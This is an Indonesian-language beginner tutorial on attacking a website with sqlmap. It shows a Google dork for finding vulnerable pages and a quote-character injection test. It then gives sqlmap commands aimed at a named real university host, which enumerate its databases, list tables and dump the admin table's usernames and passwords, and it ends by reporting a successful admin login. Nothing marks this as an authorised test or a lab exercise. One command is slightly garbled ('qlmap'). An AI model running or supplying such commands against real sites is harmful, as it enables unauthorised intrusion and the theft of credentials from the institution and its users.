Begini cara menggunakan sqlmap pemula

Begini cara menggunakan sqlmap pemula  - Sqlmap merupakan tools untuk melakukan eksploitasi Sql Injection.

1. dorking sesuai dengan metode yang akan di gunakan. Disini saya akan menggunakan metode Sql injection. Dork : inurl:detail-dosen.php?id=

2. masuk web kemudian cek apakah vuln terhadap sql inject atau tidak.

- tes dengan karakter ‘ terdapat data yang hilang.

3. selanjutnya menggunakan sqlmap, command yang digunakan

(sqlmap -u "http://data.fmipa.unand.ac.id/matematika/web/detail-dosen.php?id=1*" --random-agent --threads 10 –dbs) terdapat database yang ada di web tersebut.

4. mendapatkan data tabel di database matematika (qlmap -u "http://data.fmipa.unand.ac.id/matematika/web/detail-dosen.php?id=1*" --random-agent --threads 10 -D matematika --tables)

5. mengambil data admin untuk login (sqlmap -u "http://data.fmipa.unand.ac.id/matematika/web/detail-dosen.php?id=1*" --random-agent --threads 10 -D matematika -T admin -C username,password,level,blokir --dump)

6. setelah mendapatkan username dan password, selanjutnya login.

7. berhasil login.